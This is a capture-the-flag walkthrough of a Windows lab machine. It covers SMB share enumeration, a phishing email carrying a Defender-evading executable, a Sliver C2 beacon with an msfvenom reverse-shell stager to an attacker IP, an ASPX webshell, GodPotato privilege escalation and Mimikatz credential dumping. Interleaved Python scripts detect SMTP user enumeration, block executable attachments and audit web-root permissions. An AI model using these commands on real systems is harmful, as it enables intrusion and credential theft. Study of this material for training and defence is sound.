
Evasive

Overview

Target: Evasive
Platform: HackSmarter Labs
Difficulty: Medium
OS: Windows Server 2022

Attack path
  1. Enumerate SMB shares to find readable .pdf files
  2. Retrieve sensitive data (creds) & try them on services
  3. Create a malicious .exe program & attach it through a phishing mail
  4. Receive an interactive shell and abuse write permissions on the web server to get RCE as another user
  5. Abuse a Windows privilege to gain SYSTEM access.

1. Initial enumeration

Full TCP port scan:

nmap -p- 10.1.254.114 -T4 -oN evasive.nmap

Result:

Nmap scan report for 10.1.254.114
Host is up (0.096s latency).
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
587/tcp   open  submission
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm

A mail stack (SMTP/POP3/IMAP), SMB, RDP and WinRM are exposed. Anonymous SMB access was denied initially:

nxc smb 10.1.254.114 -u '' -p '' --shares
# [-] Winserver01\: STATUS_ACCESS_DENIED

A Nuclei scan nevertheless reported that anonymous SMB read access was possible, using a blank (space) credential bypass:

nuclei -target 10.1.254.114 -dut
# [smb-anonymous-access] [javascript] [high] 10.1.254.114:445

2. SMB enumeration & Creds hunting

Using a space character as user:pass to bypass the restriction:

nxc smb 10.1.254.114 -u ' ' -p ' ' --shares
nxc smb 10.1.254.114 -u ' ' -p ' ' -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=10.1.254.114.shares MAX_FILE_SIZE=100000000

Files retrieved:

├── 10.1.254.114.json
└── 10.1.254.114
    └── docs
        ├── mail_doc.pdf
        └── old_user_setup_doc.pdf

Metadata extraction with exiftool revealed two usernames:

exiftool *.pdf
# Author: alfonso@winserver01.hs
# Author: roger@winserver01.hs

The old_user_setup_doc.pdf contained a default password in its content:

NewUser2024!

Build users.txt with both usernames and passwords.txt with the password, then try them against SMB:

nxc smb 10.1.254.114 -u ./users.txt -p ./passwords.txt --shares --continue-on-success
# [-] Winserver01\alfonso:NewUser2024! STATUS_LOGON_FAILURE
# [-] Winserver01\roger:NewUser2024!   STATUS_LOGON_FAILURE

That didn't work. However, according to mail_doc.pdf, Alfonso is waiting for an .exe program from Roger. So we could try to authenticate to the SMTP service as roger@winserver01.hs, using the default password discovered in the other .pdf, and send a mail to alfonso@winserver01.hs.

To confirm this assumption, we can try user enumeration on the exposed services.

SMTP confirmed both accounts (via RCPT; the other methods are restricted):

smtp-user-enum -U ./users.txt -d winserver01.hs -m RCPT 10.1.254.114 25
# [SUCC] alfonso    250 OK
# [SUCC] roger      250 OK

RID brute-forcing via SMB also confirmed the user list:

nxc smb 10.1.60.87 -u ' ' -p ' ' --rid-brute
# 1000: WINSERVER01\alfonso (SidTypeUser)
# 1001: WINSERVER01\roger   (SidTypeUser)
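The RCPT probing above leaves a distinctive trace on the mail server: one client walks through many recipients in a burst, most of them rejected, and the few 250 replies tell it which mailboxes exist. The detector below is an added example for this writeup (not part of the original page or of smtp-user-enum); it parses constructed log lines in an assumed format and raises one alert per source that probes at least five distinct recipients within a minute, listing the accounts the probing confirmed, since those are the ones a responder should treat as disclosed.

```python
"""Detect SMTP recipient enumeration (RCPT/VRFY/EXPN probing) in mail logs.

Added example for this writeup, not code from the page or from
smtp-user-enum. The log line format below is an assumption constructed
for the demo; adapt LINE_RE to the format of the real mail server.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: <ISO timestamp> <client ip> <command> -> <reply code>
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.200.39.230 RCPT TO:<alfonso@winserver01.hs> -> 250
2024-05-01T10:00:01 10.200.39.230 RCPT TO:<roger@winserver01.hs> -> 250
2024-05-01T10:00:02 10.200.39.230 RCPT TO:<admin@winserver01.hs> -> 550
2024-05-01T10:00:02 10.200.39.230 RCPT TO:<bob@winserver01.hs> -> 550
2024-05-01T10:00:03 10.200.39.230 RCPT TO:<carol@winserver01.hs> -> 550
2024-05-01T10:00:03 10.200.39.230 VRFY dave -> 252
2024-05-01T10:00:04 10.200.39.230 RCPT TO:<eve@winserver01.hs> -> 550
2024-05-01T10:05:00 10.1.20.7 MAIL FROM:<roger@winserver01.hs> -> 250
2024-05-01T10:05:00 10.1.20.7 RCPT TO:<alfonso@winserver01.hs> -> 250
2024-05-01T10:05:01 10.1.20.7 DATA -> 354
"""

# Only the commands that reveal whether a mailbox exists are of interest
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<verb>RCPT TO|VRFY|EXPN):?\s*<?(?P<target>[^>\s]+)>? -> (?P<code>\d{3})$"
)


def parse_probes(log_text):
    """Return the probe commands from the log, oldest first."""
    probes = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # MAIL FROM, DATA, etc. are not probes
        probes.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "src": m["src"],
            "verb": m["verb"],
            "target": m["target"].lower(),
            "code": int(m["code"]),
        })
    return sorted(probes, key=lambda p: p["ts"])


def detect_enumeration(log_text, window=timedelta(seconds=60), min_targets=5):
    """One alert per source that probes >= min_targets distinct names within `window`."""
    by_src = defaultdict(list)
    for p in parse_probes(log_text):
        by_src[p["src"]].append(p)

    alerts = []
    for src, probes in by_src.items():
        best, start = None, 0
        for end in range(len(probes)):
            # slide the window start forward until the span fits inside `window`
            while probes[end]["ts"] - probes[start]["ts"] > window:
                start += 1
            seen = probes[start:end + 1]
            targets = {p["target"] for p in seen}
            if len(targets) >= min_targets and (best is None or len(targets) > best["probed"]):
                best = {
                    "src": src,
                    "first": seen[0]["ts"].isoformat(),
                    "last": seen[-1]["ts"].isoformat(),
                    "probed": len(targets),
                    "rejected": sum(1 for p in seen if 500 <= p["code"] < 600),
                    # names the server acknowledged with 250: treat these as disclosed
                    "confirmed": sorted({p["target"] for p in seen if p["code"] == 250}),
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_enumeration(SAMPLE_LOG):
        print(alert)
```

The threshold and window are the tunable part: a legitimate bulk sender also issues many RCPT commands, but it gets few 5xx rejections, so the `rejected` count is the field worth weighting in a production rule.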

3. Initial access

Sliver C2 Setup

Generate a stageless shellcode profile on the Sliver server:

profiles new --http 10.200.39.230:8999 --skip-symbols --format shellcode hs-evasive
http -L 10.200.39.230 -l 8999
stage-listener --url tcp://10.200.39.230:9999 --profile hs-evasive --prepend-size

I personally use a custom Go shellcode encrypter (SPECK algorithm) and loader, so I'm using msfvenom to generate an initial Go payload:

msfvenom -p windows/x64/custom/reverse_tcp LHOST=10.200.39.230 LPORT=9999 -f go -o /tmp/stager.go -b '\x00\x0a\x0d'

At this point, you need to generate the .exe that will bypass Windows Defender detection, using whatever method you prefer. Note that you could also generate the malicious .exe directly with Sliver.

Sending the phishing email

The password found previously isn't the real one, but it gives us enough information to find the real one.

Hint

Think about companies & bad habits.

Hint 2

Starting from the password found, you're 1 letter away from the correct one 😄

sendEmail \
  -t 'alfonso@winserver01.hs' \
  -f 'roger@winserver01.hs' \
  -xu 'roger@winserver01.hs' \
  -xp 'fakepass!' \
  -s 10.1.60.87 \
  -u "EXE Program" \
  -m "Hello Alfonso,\nYou can find the EXE program on attached files.\n\nSincerely,\nRoger" \
  -a ./runner-indirect.exe \
  -v

Alfonso opened the attachment and the Sliver beacon connected back, giving an interactive shell as WINSERVER01\alfonso.
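The lure works because the mail server delivered an executable attachment sent between two internal addresses. As an added example (not from the page, and not from sendEmail), the script below shows the check a mail gateway performs at that point: it constructs a message shaped like the one above, then inspects every attachment both by extension and by content, so that a PE image renamed to .pdf is still caught.

```python
"""Block executable attachments at the mail gateway.

Added example for this writeup, not code from the page or from sendEmail.
The message is constructed inline to resemble the phishing mail above; the
blocked-extension list is an assumption and not exhaustive.
"""
import email
from email.message import EmailMessage
from email.policy import default

# Extensions typically rejected outright for inbound mail (assumption; trim or extend per policy)
BLOCKED_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd",
                      ".ps1", ".js", ".vbs", ".hta", ".msi", ".lnk", ".iso"}
PE_MAGIC = b"MZ"  # every Windows PE image starts with this DOS header signature


def build_sample_message(attachment_name: str, payload: bytes) -> bytes:
    """Construct a message shaped like the lure in the writeup (sample data only)."""
    msg = EmailMessage()
    msg["From"] = "roger@winserver01.hs"
    msg["To"] = "alfonso@winserver01.hs"
    msg["Subject"] = "EXE Program"
    msg.set_content("Hello Alfonso,\nYou can find the EXE program on attached files.\n\nSincerely,\nRoger")
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=attachment_name)
    return msg.as_bytes()


def find_executable_attachments(raw: bytes):
    """Return one finding per attachment that is executable by name or by content."""
    msg = email.message_from_bytes(raw, policy=default)
    findings = []
    for part in msg.walk():            # walk() also reaches attachments nested in sub-multiparts
        if part.is_multipart():
            continue
        name = part.get_filename()
        if not name:
            continue                   # body text, not an attachment
        data = part.get_payload(decode=True) or b""
        ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
        reasons = []
        if ext in BLOCKED_EXTENSIONS:
            reasons.append(f"blocked extension {ext}")
        if data.startswith(PE_MAGIC):
            reasons.append("PE header (MZ) in content")   # catches a renamed .exe
        if reasons:
            findings.append({"filename": name, "size": len(data), "reasons": reasons})
    return findings


def verdict(raw: bytes) -> str:
    """Gateway decision: quarantine anything carrying an executable attachment."""
    return "quarantine" if find_executable_attachments(raw) else "deliver"


if __name__ == "__main__":
    sample = build_sample_message("runner-indirect.exe", PE_MAGIC + b"\x90" * 64)
    print(verdict(sample), find_executable_attachments(sample))
```

Checking the content signature is the part that matters: extension blocklists are trivially sidestepped by renaming, while the `MZ` header has to be present for Windows to run the file at all. Archives (zip, 7z) need to be opened and each member passed through the same function, which this example does not do.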

Documents found on the system:

C:\Users\alfonso\Documents\Database.kdbx
C:\Users\alfonso\Documents\merger-info.pdf

The merger-info.pdf revealed the company name, which was the first flag.


4. Lateral movement

Alfonso had write access to the IIS web root:

icacls.exe c:\inetpub\wwwroot
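icacls only lists the ACEs; what matters is whether any principal outside the expected set (SYSTEM, Administrators, TrustedInstaller) holds a right that allows writing into the web root, because that turns an ordinary user account into code execution as the application pool identity. The script below is an added example for this writeup, not the page's own tooling: it parses a constructed icacls listing (resembling, but not copied from, the lab host) and reports such principals, including those granted write through specific rights such as WD/AD rather than the simple M or F.

```python
"""Audit an icacls listing of the IIS web root for principals that can write.

Added example for this writeup (not the page's own tooling). It works on the
text icacls prints, so it can run offline on collected output; the listing
below is constructed to resemble a web root ACL and includes the kind of
over-permissive ACE this writeup relies on.
"""
import re

# Constructed icacls output (not captured from the lab host)
SAMPLE_ICACLS = r"""
c:\inetpub\wwwroot NT SERVICE\TrustedInstaller:(F)
                   NT SERVICE\TrustedInstaller:(OI)(CI)(IO)(F)
                   NT AUTHORITY\SYSTEM:(F)
                   BUILTIN\Administrators:(F)
                   BUILTIN\IIS_IUSRS:(OI)(CI)(RX)
                   BUILTIN\Users:(OI)(CI)(RX)
                   WINSERVER01\alfonso:(OI)(CI)(M)
                   WINSERVER01\webdeploy:(I)(OI)(CI)(RC,S,RD,WD,AD,X,RA)

Successfully processed 1 files; Failed processing 0 files
"""

INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple and specific icacls rights that let a principal add, change or remove files
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "WDAC", "WO", "DC", "DE", "GW", "GA"}
# Principals expected to hold full control of system-owned paths
TRUSTED = {"nt authority\\system", "builtin\\administrators", "nt service\\trustedinstaller"}

ACE_LINE = re.compile(r"^(?P<principal>.+?):(?P<aces>(?:\([^)]*\))+)$")


def parse_icacls(output, path):
    """Return [(principal, inheritance_flags, rights)] for every ACE listed."""
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()   # the first ACE line carries the path prefix
        m = ACE_LINE.match(line)
        if not m:
            continue                          # blank lines and the summary line
        flags, rights = set(), set()
        for token in re.findall(r"\(([^)]*)\)", m["aces"]):
            for item in token.split(","):     # specific rights are comma-separated inside one pair
                item = item.strip().upper()
                (flags if item in INHERITANCE_FLAGS else rights).add(item)
        entries.append((m["principal"], flags, rights))
    return entries


def writable_by_untrusted(output, path, trusted=TRUSTED):
    """Principals outside `trusted` that hold any write-capable right on the path."""
    findings = []
    for principal, flags, rights in parse_icacls(output, path):
        if principal.lower() in trusted:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            findings.append({
                "principal": principal,
                "rights": granted,
                "inherit_only": "IO" in flags,   # applies to children, not the folder itself
            })
    return findings


if __name__ == "__main__":
    for finding in writable_by_untrusted(SAMPLE_ICACLS, r"c:\inetpub\wwwroot"):
        print(finding)
```

The expected result on a hardened web root is an empty list: IIS_IUSRS and the application pool identity need read and execute only, and deployment accounts should write through a separate staging path rather than directly into wwwroot.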

Upload a classic ASPX webshell from the Sliver session:

cd C:\inetpub\wwwroot
upload /home/h0lm/Tools/revshells/cmd.aspx

Browse to http://10.1.60.87/cmd.aspx?cmd=whoami to confirm code execution as the web service account.

I personally relaunched the malicious .exe that was already on disk to create a new Sliver session under this new identity.


5. Privilege escalation

In our new session, SeImpersonatePrivilege was enabled. Use GodPotato (or a similar Potato exploit) to escalate to NT AUTHORITY\SYSTEM:

execute-assembly /home/h0lm/Tools/windows/GodPotato-NET4.exe -- -cmd 'c:\inetpub\wwwroot\program2.exe'

This spawned a new Sliver session running as NT AUTHORITY\SYSTEM.

Persistence & Credential Dumping

Since we have a SYSTEM Sliver session on the target, we can dump hashes via Mimikatz:

armory install mimikatz
mimikatz "privilege::debug" "token::elevate" "lsadump::sam" "exit"
mimikatz "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

These commands retrieve the Administrator's hash (2nd flag) and the workstation's DefaultPassword; we can now try that password to connect as alfonso over RDP.

Connect via RDP:

xfreerdp /u:'alfonso' /p:'D2RE6xBc2pBO' /v:10.1.60.87 /cert:ignore /dynamic-resolution /kbd:layout:0x0000040c /scale-desktop:150 +clipboard

The SMB connection was successful, and the RDP session showed us the last flag because Alfonso's KeePass was open!